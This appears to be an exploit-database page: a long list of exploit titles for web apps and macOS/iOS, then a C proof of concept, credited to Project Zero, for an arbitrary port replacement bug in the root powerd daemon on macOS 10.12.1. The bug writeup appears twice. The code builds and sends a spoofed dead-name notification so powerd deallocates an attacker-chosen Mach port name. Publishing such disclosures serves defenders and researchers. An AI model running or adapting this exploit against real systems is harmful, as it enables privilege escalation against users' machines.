
10 new exploits Microsoft Internet Explorer 11 - MSHTML CPasteCommand::ConvertBitmaptoPng Heap-Based Buffer Overflow (MS14-056) Microsoft Internet Explorer 11 MSHTML - CSpliceTreeEngine::RemoveSplice Use-After-Free (MS14-035) Microsoft Internet Explorer 11 - MSHTML CSpliceTreeEngine::RemoveSplice Use-After-Free (MS14-035) macOS 10.12.1 Kernel - Writable Privileged IOKit Registry Properties Code Execution macOS 10.12 - Double vm_deallocate in Userspace MIG Code Use-After-Free macOS < 10.12.2 / iOS < 10.2 Kernel - ipc_port_t Reference Count Leak Due to Incorrect externalMethod Overrides Use-After-Free macOS 10.12.1 / iOS < 10.2 - powerd Arbitrary Port Replacement macOS 10.12.1 / iOS < 10.2 - syslogd Arbitrary Port Replacement IBM AIX 6.1/7.1/7.2 - 'Bellmail' Privilege Escalation Vesta Control Panel 0.9.8-16 - Local Privilege Escalation macOS < 10.12.2 / iOS < 10.2 Kernel - _kernelrpc_mach_port_insert_right_trap Reference Count Leak / Use-After-Free macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation PHP iCalendar 2.21 - (publish.ical.php) Remote Code Execution PHP iCalendar 2.21 - 'publish.ical.php' Remote Code Execution CzarNews 1.14 - (tpath) Remote File Inclusion CzarNews 1.14 - 'tpath' Parameter Remote File Inclusion N/X WCMS 4.1 - (nxheader.inc.php) Remote File Inclusion N/X WCMS 4.1 - 'nxheader.inc.php' Remote File Inclusion Powies pForum 1.29a - (editpoll.php) SQL Injection Powies pForum 1.29a - 'editpoll.php' SQL Injection AssetMan 2.4a - (download_pdf.php) Remote File Disclosure AssetMan 2.4a - 'download_pdf.php' Remote File Disclosure Orion-Blog 2.0 - (AdminBlogNewsEdit.asp) Remote Authentication Bypass Orion-Blog 2.0 - Remote Authentication Bypass Ol BookMarks Manager 0.7.4 - (root) Remote File Inclusion Ol BookMarks Manager 0.7.4 - 'root' Parameter Remote File Inclusion AdminBot 9.0.5 - (live_status.lib.php ROOT) Remote File Inclusion AdminBot 9.0.5 - 'live_status.lib.php' Remote File Inclusion WSN Links Basic Edition - (displaycat catid) SQL Injection WSN Links Basic Edition - 'catid' Parameter SQL Injection phpRealty 0.02 - (MGR) Multiple Remote File Inclusion phpRealty 0.02 - 'MGR' Parameter Multiple Remote File Inclusion jPORTAL 2 - mailer.php SQL Injection jPORTAL 2.3.1 - articles.php SQL Injection jPORTAL 2 - 'mailer.php' SQL Injection jPORTAL 2.3.1 - 'articles.php' SQL Injection AvailScript Jobs Portal Script - Authenticated (jid) SQL Injection AvailScript Jobs Portal Script - 'jid' Parameter SQL Injection PhpWebGallery 1.3.4 - Cross-Site Scripting / Local File Inclusion PHPWebGallery 1.3.4 - Cross-Site Scripting / Local File Inclusion D-iscussion Board 3.01 - (topic) Local File Inclusion D-iscussion Board 3.01 - 'topic' Parameter Local File Inclusion PhpWebGallery 1.3.4 - Blind SQL Injection PHPWebGallery 1.3.4 - Blind SQL Injection PhpWebGallery 1.3.4 - Blind SQL Injection pForum 1.30 - (showprofil.php id) SQL Injection WebPortal CMS 0.7.4 - (download.php aid) SQL Injection iBoutique 4.0 - (cat) SQL Injection SkaLinks 1.5 - (register.php) Arbitrary Add Editor vbLOGIX Tutorial Script 1.0 - 'cat_id' SQL Injection PHPWebGallery 1.3.4 - Blind SQL Injection pForum 1.30 - 'showprofil.php' SQL Injection WebPortal CMS 0.7.4 - 'download.php' SQL Injection iBoutique 4.0 - 'cat' Parameter SQL Injection SkaLinks 1.5 - 'register.php' Arbitrary Add Editor vbLOGIX Tutorial Script 1.0 - 'cat_id' Parameter SQL Injection pLink 2.07 - (linkto.php id) Blind SQL Injection pLink 2.07 - 'linkto.php' Blind SQL Injection FoT Video scripti 1.1b - (oyun) SQL Injection FoT Video scripti 1.1b - 'oyun' Parameter SQL Injection Pre Real Estate Listings - 'search.php c' SQL Injection Pre Real Estate Listings - 'search.php' SQL Injection iScripts EasyIndex - (produid) SQL Injection iScripts EasyIndex - 'produid' Parameter SQL Injection Hotel Reservation System - 'city.asp city' Blind SQL Injection phpRealty 0.3 - (INC) Remote File Inclusion PHP Crawler 0.8 - (footer) Remote File Inclusion Technote 7 - (shop_this_skin_path) Remote File Inclusion Hotel Reservation System - 'city.asp' Blind SQL Injection phpRealty 0.3 - 'INC' Parameter Remote File Inclusion PHP Crawler 0.8 - Remote File Inclusion Technote 7 - 'shop_this_skin_path' Parameter Remote File Inclusion E-PHP CMS - 'article.php es_id' SQL Injection addalink 4 - 'category_id' SQL Injection ProArcadeScript 1.3 - (random) SQL Injection CYASK 3.x - (collect.php neturl) Local File Disclosure Diesel Joke Site - 'picture_category.php id' SQL Injection ProActive CMS - 'template' Local File Inclusion E-PHP CMS - 'article.php' SQL Injection addalink 4 - 'category_id' Parameter SQL Injection ProArcadeScript 1.3 - 'random' Parameter SQL Injection CYASK 3.x - 'neturl' Parameter Local File Disclosure Diesel Joke Site - 'picture_category.php' SQL Injection ProActive CMS - 'template' Parameter Local File Inclusion Diesel Pay Script - (area) SQL Injection Plaincart 1.1.2 - (p) SQL Injection Oceandir 2.9 - (show_vote.php id) SQL Injection jPORTAL 2 - 'humor.php id' SQL Injection Diesel Pay Script - 'area' Parameter SQL Injection Plaincart 1.1.2 - 'p' Parameter SQL Injection Oceandir 2.9 - 'show_vote.php' SQL Injection jPORTAL 2 - 'humor.php' SQL Injection Diesel Job Site - (job_id) Blind SQL Injection Diesel Job Site - 'job_id' Parameter Blind SQL Injection e107 Plugin Image Gallery 0.9.6.2 - (image) SQL Injection e107 Plugin Image Gallery 0.9.6.2 - SQL Injection WSN Links 2.22/2.23 - (vote.php) SQL Injection WSN Links 2.22/2.23 - 'vote.php' SQL Injection BuzzyWall 1.3.1 - (search.php search) SQL Injection WCMS 1.0b - (news_detail.asp id) SQL Injection BuzzyWall 1.3.1 - 'search' Parameter SQL Injection WCMS 1.0b - 'news_detail.asp' SQL Injection OpenElec 3.01 - (form.php obj) Local File Inclusion OpenElec 3.01 - 'obj' Parameter Local File Inclusion basebuilder 2.0.1 - (main.inc.php) Remote File Inclusion Fez 1.3/2.0 RC1 - (list.php) SQL Injection basebuilder 2.0.1 - 'main.inc.php' Remote File Inclusion Fez 1.3/2.0 RC1 - 'list.php' SQL Injection OpenRat 0.8-beta4 - (tpl_dir) Remote File Inclusion Sofi WebGui 0.6.3 PRE - (mod_dir) Remote File Inclusion OpenRat 0.8-beta4 - 'tpl_dir' Parameter Remote File Inclusion Sofi WebGui 0.6.3 PRE - 'mod_dir' Parameter Remote File Inclusion JETIK-WEB Software - 'sayfa.php kat' SQL Injection JETIK-WEB Software - 'kat' Parameter SQL Injection WebPortal CMS 0.7.4 - (code) Remote Code Execution HotScripts Clone - 'cid' SQL Injection WebPortal CMS 0.7.4 - 'code' Parameter Remote Code Execution HotScripts Clone - 'cid' Parameter SQL Injection emergecolab 1.0 - (sitecode) Local File Inclusion mailwatch 1.0.4 - (docs.php doc) Local File Inclusion PHPcounter 1.3.2 - (defs.php l) Local File Inclusion emergecolab 1.0 - 'sitecode' Parameter Local File Inclusion mailwatch 1.0.4 - 'doc' Parameter Local File Inclusion PHPcounter 1.3.2 - 'defs.php' Local File Inclusion webcp 0.5.7 - (filelocation) Remote File Disclosure webcp 0.5.7 - 'filelocation' Parameter Remote File Disclosure LanSuite 3.3.2 - (design) Local File Inclusion PHPOCS 0.1-beta3 - (index.php act) Local File Inclusion Vikingboard 0.2 Beta - (task) Local File Inclusion LanSuite 3.3.2 - 'design' Parameter Local File Inclusion PHPOCS 0.1-beta3 - 'act' Parameter Local File Inclusion Vikingboard 0.2 Beta - 'task' Parameter Local File Inclusion barcodegen 2.0.0 - (class_dir) Remote File Inclusion barcodegen 2.0.0 - 'class_dir' Parameter Remote File Inclusion PHPcounter 1.3.2 - (index.php name) SQL Injection PHPcounter 1.3.2 - 'index.php' SQL Injection PhpWebGallery 1.7.2 - Session Hijacking / Code Execution PHPWebGallery 1.7.2 - Session Hijacking / Code Execution BuzzyWall 1.3.1 - (download id) Remote File Disclosure BuzzyWall 1.3.1 - 'id' Parameter Remote File Disclosure Pre Real Estate Listings - (Authentication Bypass) SQL Injection Pre Real Estate Listings - Authentication Bypass Netartmedia Real Estate Portal 1.2 - (ad_id) SQL Injection Netartmedia Real Estate Portal 1.2 - 'ad_id' Parameter SQL Injection SkaLinks 1.5 - (Authentication Bypass) SQL Injection SkaLinks 1.5 - Authentication Bypass diesel job site 1.4 - Multiple Vulnerabilities Diesel Job Site 1.4 - Multiple Vulnerabilities ProArcadeScript to Game - (game) SQL Injection ProArcadeScript to Game - SQL Injection Link Bid Script - 'links.php id' SQL Injection Link Bid Script - 'links.php' SQL Injection NetArt Media iBoutique 4.0 - (index.php key Parameter) SQL Injection iBoutique 4.0 - 'key' Parameter SQL Injection PHPForum 2.0 RC1 - Mainfile.php Remote File Inclusion PHPForum 2.0 RC1 - 'Mainfile.php' Remote File Inclusion JPortal 2.2.1 - print.php SQL Injection jPORTAL 2.2.1 - 'print.php' SQL Injection CzarNews 1.13/1.14 - headlines.php Remote File Inclusion CzarNews 1.13/1.14 - 'headlines.php' Remote File Inclusion JPortal 2.3.1 - Banner.php SQL Injection jPORTAL 2.3.1 - 'Banner.php' SQL Injection CJ Ultra Plus 1.0.3/1.0.4 - OUT.php SQL Injection CJ Ultra Plus 1.0.3/1.0.4 - 'OUT.php' SQL Injection JPortal 2.2.1/2.3.1 - download.php SQL Injection jPORTAL 2.2.1/2.3.1 - 'download.php' SQL Injection JPortal Web Portal 2.2.1/2.3.1 - comment.php id Parameter SQL Injection JPortal Web Portal 2.2.1/2.3.1 - news.php id Parameter SQL Injection JPortal Web Portal 2.2.1/2.3.1 - 'comment.php' SQL Injection JPortal Web Portal 2.2.1/2.3.1 - 'news.php' SQL Injection PHPWCMS 1.2.5 -DEV - random_image.php imgdir Parameter Traversal Arbitrary File Access PHPWCMS 1.2.5 -DEV - 'imgdir' Parameter Traversal Arbitrary File Access JPortal 2.2.1/2.3 Forum - forum.php SQL Injection jPORTAL 2.2.1/2.3 Forum - 'forum.php' SQL Injection Diesel Joke Site - Category.php SQL Injection Diesel Joke Site - 'Category.php' SQL Injection TinyPHPForum 3.6 - error.php Information Disclosure TinyPHPForum 3.6 - UpdatePF.php Authentication Bypass TinyPHPForum 3.6 - 'error.php' Information Disclosure TinyPHPForum 3.6 - 'UpdatePF.php' Authentication Bypass Vikingboard Viking board 0.1b - help.php act Parameter Cross-Site Scripting Vikingboard Viking board 0.1b - report.php p Parameter Cross-Site Scripting Vikingboard 0.1 - topic.php SQL Injection Vikingboard 0.1b - 'help.php' Cross-Site Scripting Vikingboard 0.1b - 'report.php' Cross-Site Scripting Vikingboard 0.1 - 'topic.php' SQL Injection PHP iCalendar 1.1/2.x - day.php Multiple Parameter Cross-Site Scripting PHP iCalendar 1.1/2.x - month.php Multiple Parameter Cross-Site Scripting PHP iCalendar 1.1/2.x - year.php Multiple Parameter Cross-Site Scripting PHP iCalendar 1.1/2.x - week.php Multiple Parameter Cross-Site Scripting PHP iCalendar 1.1/2.x - search.php Multiple Parameter Cross-Site Scripting PHP iCalendar 1.1/2.x - rss/index.php getdate Parameter Cross-Site Scripting PHP iCalendar 1.1/2.x - print.php getdate Parameter Cross-Site Scripting PHP iCalendar 1.1/2.x - preferences.php Multiple Parameter Cross-Site Scripting PHP iCalendar 1.1/2.x - 'day.php' Cross-Site Scripting PHP iCalendar 1.1/2.x - 'month.php' Cross-Site Scripting PHP iCalendar 1.1/2.x - 'year.php' Cross-Site Scripting PHP iCalendar 1.1/2.x - 'week.php' Cross-Site Scripting PHP iCalendar 1.1/2.x - 'search.php' Cross-Site Scripting PHP iCalendar 1.1/2.x - 'getdate' Parameter Cross-Site Scripting PHP iCalendar 1.1/2.x - 'print.php' Cross-Site Scripting PHP iCalendar 1.1/2.x - 'preferences.php' Cross-Site Scripting Vikingboard Viking board 0.1.2 - cp.php Multiple Parameter Cross-Site Scripting Vikingboard Viking board 0.1.2 - user.php u Parameter Cross-Site Scripting Vikingboard Viking board 0.1.2 - post.php Multiple Parameter Cross-Site Scripting Vikingboard Viking board 0.1.2 - topic.php s Parameter Cross-Site Scripting Vikingboard Viking board 0.1.2 - forum.php debug Variable Information Disclosure Vikingboard Viking board 0.1.2 - cp.php debug Variable Information Disclosure Vikingboard 0.1.2 - 'cp.php' Cross-Site Scripting Vikingboard 0.1.2 - 'user.php' Cross-Site Scripting Vikingboard 0.1.2 - 'post.php' Cross-Site Scripting Vikingboard 0.1.2 - 'topic.php' Cross-Site Scripting Vikingboard 0.1.2 - 'forum.php' Information Disclosure Vikingboard 0.1.2 - 'cp.php' Information Disclosure PaysiteReviewCMS 1.1 - search.php q Parameter Cross-Site Scripting PaysiteReviewCMS - image.php image Parameter Cross-Site Scripting PaysiteReviewCMS 1.1 - 'search.php' Cross-Site Scripting PaysiteReviewCMS - 'image.php' Cross-Site Scripting BuzzScripts BuzzyWall 1.3.2 - 'resolute.php' Information Disclosure BuzzyWall 1.3.2 - 'resolute.php' Information Disclosure
263 lines
No EOL
10 KiB
C
Executable file
263 lines
No EOL
10 KiB
C
Executable file
/*
|
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=976
|
|
|
|
powerd (running as root) hosts the com.apple.PowerManagement.control mach service.
|
|
|
|
It checks in with launchd to get a server port and then wraps that in a CFPort:
|
|
|
|
pmServerMachPort = _SC_CFMachPortCreateWithPort(
|
|
"PowerManagement",
|
|
serverPort,
|
|
mig_server_callback,
|
|
&context);
|
|
|
|
It also asks to receive dead name notifications for other ports on that same server port:
|
|
|
|
mach_port_request_notification(
|
|
mach_task_self(), // task
|
|
notify_port_in, // port that will die
|
|
MACH_NOTIFY_DEAD_NAME, // msgid
|
|
1, // make-send count
|
|
CFMachPortGetPort(pmServerMachPort), // notify port
|
|
MACH_MSG_TYPE_MAKE_SEND_ONCE, // notifyPoly
|
|
&oldNotify); // previous
|
|
|
|
mig_server_callback is called off of the mach port run loop source to handle new messages on pmServerMachPort:
|
|
|
|
static void
|
|
mig_server_callback(CFMachPortRef port, void *msg, CFIndex size, void *info)
|
|
{
|
|
mig_reply_error_t * bufRequest = msg;
|
|
mig_reply_error_t * bufReply = CFAllocatorAllocate(
|
|
NULL, _powermanagement_subsystem.maxsize, 0);
|
|
mach_msg_return_t mr;
|
|
int options;
|
|
|
|
__MACH_PORT_DEBUG(true, "mig_server_callback", serverPort);
|
|
|
|
/* we have a request message */
|
|
(void) pm_mig_demux(&bufRequest->Head, &bufReply->Head);
|
|
|
|
This passes the raw message to pm_mig_demux:
|
|
|
|
static boolean_t
|
|
pm_mig_demux(
|
|
mach_msg_header_t * request,
|
|
mach_msg_header_t * reply)
|
|
{
|
|
mach_dead_name_notification_t *deadRequest =
|
|
(mach_dead_name_notification_t *)request;
|
|
boolean_t processed = FALSE;
|
|
|
|
processed = powermanagement_server(request, reply);
|
|
|
|
if (processed)
|
|
return true;
|
|
|
|
if (MACH_NOTIFY_DEAD_NAME == request->msgh_id)
|
|
{
|
|
__MACH_PORT_DEBUG(true, "pm_mig_demux: Dead name port should have 1+ send right(s)", deadRequest->not_port);
|
|
|
|
PMConnectionHandleDeadName(deadRequest->not_port);
|
|
|
|
__MACH_PORT_DEBUG(true, "pm_mig_demux: Deallocating dead name port", deadRequest->not_port);
|
|
mach_port_deallocate(mach_task_self(), deadRequest->not_port);
|
|
|
|
reply->msgh_bits = 0;
|
|
reply->msgh_remote_port = MACH_PORT_NULL;
|
|
|
|
return TRUE;
|
|
}
|
|
|
|
This passes the message to the MIG-generated code for the powermanagement subsystem, if that fails (because the msgh_id doesn't
|
|
match the subsystem for example) then this compares the message's msgh_id field to MACH_NOTIFY_DEAD_NAME.
|
|
|
|
deadRequest is the message cast to a mach_dead_name_notification_t which is defined like this in mach/notify.h:
|
|
|
|
typedef struct {
|
|
mach_msg_header_t not_header;
|
|
NDR_record_t NDR;
|
|
mach_port_name_t not_port;/* MACH_MSG_TYPE_PORT_NAME */
|
|
mach_msg_format_0_trailer_t trailer;
|
|
} mach_dead_name_notification_t;
|
|
|
|
This is a simple message, not a complex one. not_port is just a completely controlled integer which in this case will get passed directly to
|
|
mach_port_deallocate.
|
|
|
|
The powerd code expects that only the kernel will send a MACH_NOTIFY_DEAD_NAME message but actually anyone can send this and force the privileged process
|
|
to drop a reference on a controlled mach port name :)
|
|
|
|
Multiplexing these two things (notifications and a mach service) onto the same port isn't possible to do safely as the kernel doesn't prevent
|
|
user->user spoofing of notification messages - usually this wouldn't be a problem as attackers shouldn't have access to the notification port.
|
|
|
|
You could use this bug to replace a mach port name in powerd (eg the bootstrap port, an IOService port etc) with a one for which the attacker holds the receieve right.
|
|
|
|
Since there's still no KDK for 10.12.1 you can test this by attaching to powerd in userspace and setting a breakpoint in pm_mig_demux at the
|
|
mach_port_deallocate call and you'll see the controlled value in rsi.
|
|
|
|
Tested on MacBookAir5,2 MacOS Sierra 10.12.1 (16B2555)
|
|
*/
|
|
|
|
// ianbeer
|
|
|
|
#if 0
|
|
MacOS/iOS arbitrary port replacement in powerd
|
|
|
|
powerd (running as root) hosts the com.apple.PowerManagement.control mach service.
|
|
|
|
It checks in with launchd to get a server port and then wraps that in a CFPort:
|
|
|
|
pmServerMachPort = _SC_CFMachPortCreateWithPort(
|
|
"PowerManagement",
|
|
serverPort,
|
|
mig_server_callback,
|
|
&context);
|
|
|
|
It also asks to receive dead name notifications for other ports on that same server port:
|
|
|
|
mach_port_request_notification(
|
|
mach_task_self(), // task
|
|
notify_port_in, // port that will die
|
|
MACH_NOTIFY_DEAD_NAME, // msgid
|
|
1, // make-send count
|
|
CFMachPortGetPort(pmServerMachPort), // notify port
|
|
MACH_MSG_TYPE_MAKE_SEND_ONCE, // notifyPoly
|
|
&oldNotify); // previous
|
|
|
|
mig_server_callback is called off of the mach port run loop source to handle new messages on pmServerMachPort:
|
|
|
|
static void
|
|
mig_server_callback(CFMachPortRef port, void *msg, CFIndex size, void *info)
|
|
{
|
|
mig_reply_error_t * bufRequest = msg;
|
|
mig_reply_error_t * bufReply = CFAllocatorAllocate(
|
|
NULL, _powermanagement_subsystem.maxsize, 0);
|
|
mach_msg_return_t mr;
|
|
int options;
|
|
|
|
__MACH_PORT_DEBUG(true, "mig_server_callback", serverPort);
|
|
|
|
/* we have a request message */
|
|
(void) pm_mig_demux(&bufRequest->Head, &bufReply->Head);
|
|
|
|
This passes the raw message to pm_mig_demux:
|
|
|
|
static boolean_t
|
|
pm_mig_demux(
|
|
mach_msg_header_t * request,
|
|
mach_msg_header_t * reply)
|
|
{
|
|
mach_dead_name_notification_t *deadRequest =
|
|
(mach_dead_name_notification_t *)request;
|
|
boolean_t processed = FALSE;
|
|
|
|
processed = powermanagement_server(request, reply);
|
|
|
|
if (processed)
|
|
return true;
|
|
|
|
if (MACH_NOTIFY_DEAD_NAME == request->msgh_id)
|
|
{
|
|
__MACH_PORT_DEBUG(true, "pm_mig_demux: Dead name port should have 1+ send right(s)", deadRequest->not_port);
|
|
|
|
PMConnectionHandleDeadName(deadRequest->not_port);
|
|
|
|
__MACH_PORT_DEBUG(true, "pm_mig_demux: Deallocating dead name port", deadRequest->not_port);
|
|
mach_port_deallocate(mach_task_self(), deadRequest->not_port);
|
|
|
|
reply->msgh_bits = 0;
|
|
reply->msgh_remote_port = MACH_PORT_NULL;
|
|
|
|
return TRUE;
|
|
}
|
|
|
|
This passes the message to the MIG-generated code for the powermanagement subsystem, if that fails (because the msgh_id doesn't
|
|
match the subsystem for example) then this compares the message's msgh_id field to MACH_NOTIFY_DEAD_NAME.
|
|
|
|
deadRequest is the message cast to a mach_dead_name_notification_t which is defined like this in mach/notify.h:
|
|
|
|
typedef struct {
|
|
mach_msg_header_t not_header;
|
|
NDR_record_t NDR;
|
|
mach_port_name_t not_port;/* MACH_MSG_TYPE_PORT_NAME */
|
|
mach_msg_format_0_trailer_t trailer;
|
|
} mach_dead_name_notification_t;
|
|
|
|
This is a simple message, not a complex one. not_port is just a completely controlled integer which in this case will get passed directly to
|
|
mach_port_deallocate.
|
|
|
|
The powerd code expects that only the kernel will send a MACH_NOTIFY_DEAD_NAME message but actually anyone can send this and force the privileged process
|
|
to drop a reference on a controlled mach port name :)
|
|
|
|
Multiplexing these two things (notifications and a mach service) onto the same port isn't possible to do safely as the kernel doesn't prevent
|
|
user->user spoofing of notification messages - usually this wouldn't be a problem as attackers shouldn't have access to the notification port.
|
|
|
|
You could use this bug to replace a mach port name in powerd (eg the bootstrap port, an IOService port etc) with a one for which the attacker holds the receieve right.
|
|
|
|
Since there's still no KDK for 10.12.1 you can test this by attaching to powerd in userspace and setting a breakpoint in pm_mig_demux at the
|
|
mach_port_deallocate call and you'll see the controlled value in rsi.
|
|
|
|
Tested on MacBookAir5,2 MacOS Sierra 10.12.1 (16B2555)
|
|
#endif
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <unistd.h>
|
|
|
|
#include <servers/bootstrap.h>
|
|
#include <mach/mach.h>
|
|
#include <mach/ndr.h>
|
|
|
|
char* service_name = "com.apple.PowerManagement.control";
|
|
|
|
struct notification_msg {
|
|
mach_msg_header_t not_header;
|
|
NDR_record_t NDR;
|
|
mach_port_name_t not_port;
|
|
};
|
|
|
|
mach_port_t lookup(char* name) {
|
|
mach_port_t service_port = MACH_PORT_NULL;
|
|
kern_return_t err = bootstrap_look_up(bootstrap_port, name, &service_port);
|
|
if(err != KERN_SUCCESS){
|
|
printf("unable to look up %s\n", name);
|
|
return MACH_PORT_NULL;
|
|
}
|
|
|
|
return service_port;
|
|
}
|
|
|
|
int main() {
|
|
kern_return_t err;
|
|
|
|
mach_port_t service_port = lookup(service_name);
|
|
|
|
mach_port_name_t target_port = 0x1234; // the name of the port in the target namespace to destroy
|
|
|
|
printf("%d\n", getpid());
|
|
printf("service port: %x\n", service_port);
|
|
|
|
struct notification_msg not = {0};
|
|
|
|
not.not_header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0);
|
|
not.not_header.msgh_size = sizeof(struct notification_msg);
|
|
not.not_header.msgh_remote_port = service_port;
|
|
not.not_header.msgh_local_port = MACH_PORT_NULL;
|
|
not.not_header.msgh_id = 0110; // MACH_NOTIFY_DEAD_NAME
|
|
|
|
not.NDR = NDR_record;
|
|
|
|
not.not_port = target_port;
|
|
|
|
// send the fake notification message
|
|
err = mach_msg(¬.not_header,
|
|
MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
|
|
(mach_msg_size_t)sizeof(struct notification_msg),
|
|
0,
|
|
MACH_PORT_NULL,
|
|
MACH_MSG_TIMEOUT_NONE,
|
|
MACH_PORT_NULL);
|
|
printf("fake notification message: %s\n", mach_error_string(err));
|
|
|
|
return 0;
|
|
} |